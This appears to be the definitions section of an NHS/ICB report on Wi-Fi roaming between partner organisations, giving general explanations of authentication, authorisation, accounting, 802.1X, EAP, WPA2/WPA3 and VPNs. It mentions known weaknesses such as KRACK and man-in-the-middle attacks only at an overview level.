Concepts and definitions

The technical definition of Wi-Fi roaming is when a wireless client leaves one Access Point (AP) within a meshed network and authenticates/associates to a new Access Point within the same meshed network, without losing connection. However, for the purpose of this report, the definition of Wi-Fi roaming is:

“Providing generic internet access to end user devices (or IoT devices) which are not in their usual corporate Wi-Fi network location (and not necessarily with accompanying private network access or routing to their corporate networks, which can be delivered via overlay Virtual Private Network services), but are in a Wi-Fi network location owned/managed by another publicly funded NHS/ICB Partner.”

Authentication is the process of verifying the identity of a user or device. In the context of Wi-Fi and network access, authentication is the process of determining whether a user or device is authorised to access the network. Authentication can be achieved using various methods, such as passwords, biometrics, smart cards, digital certificates or other credentials.

Authorisation is required following authentication. Authorisation is the process of determining what actions or resources a user or device is permitted to access. In the context of Wi-Fi and network access, authorisation involves granting specific privileges or permissions to authenticated users or devices based on their identity and role in the organisation.

For example, when a user connects to a Wi-Fi network, they may be required to enter a password to authenticate themselves. Once authenticated, the user’s device is granted access to the network and may be authorised to access specific resources, such as printers or servers, based on their role within the organisation. Similarly, when a device connects to a network, it may need to be authenticated and authorised before being granted access to the network.

Authentication and authorisation are critical components of network security, as they help ensure that only authorised users and devices can access the network, and that they only have access to the resources they need to do their job. Without adequate authentication and authorisation, networks and the data they contain are vulnerable to attack.

Accounting is the process of collecting information about network usage and storing it in a database for later analysis. It involves recording information about user sessions, such as the time of login and logout, the services accessed, the amount of data transferred, and other details related to network usage. Accounting information can be used to detect security breaches or suspicious activity on the network and it can be used to ensure that the network is being used in compliance with organisational policies and regulations.

Organisations that collect data about network usage should ensure that they do so in compliance with Data Protection Legislation and the General Data Protection Regulations (GDPR).

IEEE Standard 802.1x is a standard for network access control that provides an authentication framework to protect networks against unauthorised access. IEEE Standard 802.1x supports Extensible Authentication Protocol (EAP) authentication methods such as passwords, smart cards and biometrics. IEEE Standard 802.1x also provides other security features, such as encryption and access control. IEEE Standard 802.1x can be vulnerable to certain types of attacks, such as man-in-the-middle attacks and spoofing. These risks can be mitigated by the use of strong authentication methods and additional security measures such as firewalls and intrusion detection systems.

The EAP security protocol that defines how to provide authentication and authorisation in a wireless network. Access to Wi-Fi networks is typically protected by a password. However, EAP provides more secure ways to authenticate users. A user’s identity can be verified through a digital certificate, a smart card or biometrics such as fingerprint or face recognition. EAP provides an additional layer of security beyond the basic Wi-Fi password and protects against man-in-the-middle attacks, where an attacker intercepts and alters communications between two parties.

Wi-Fi Protected Access 2 (WPA2) is currently the most widely used Wi-Fi security protocol. WPA2 uses the Advanced Encryption Standard (AES) to encrypt data in transit and provides authentication using the 802.1X protocol with EAP or Pre-Shared Key (PSK). WPA2 is vulnerable to brute-force attacks and Key Reinstallation Attacks (KRACK), which exploit weaknesses in the WPA2 handshake to intercept and decrypt network traffic.

WPA3 was introduced in 2018 and is the most secure Wi-Fi security protocol available today. It uses a new encryption algorithm named Simultaneous Authentication of Equals (SAE) to address the weaknesses of WPA2. It also improves how devices connect to the network and improves protection against phishing attacks. WPA3 supports individualised data encryption, which provides a unique encryption key for each device, making it more difficult for attackers to decrypt network traffic.

Virtual Private Networks create a secure, encrypted connection between a user’s device and a remote server, allowing the user to access the internet as if they were directly connected to the server’s network. VPNs can be used to provide remote access to a network, allowing employees to securely connect to their employer’s private network from anywhere in the world. VPNs hide the user’s IP address to provide privacy and to prevent the collection of data regarding online behaviour. VPNs encrypt data during transit using one of several protocols such as PPTP (Point-to-Point Tunnelling Protocol), L2TP/IPSec (Layer 2 Tunnelling Protocol with Internet Protocol Security), OpenVPN, SSTP (Secure Socket Tunnelling Protocol) and IKEv2 (Internet Key Exchange version 2). Each of the protocols has strengths and weaknesses regarding security, speed and ease of use.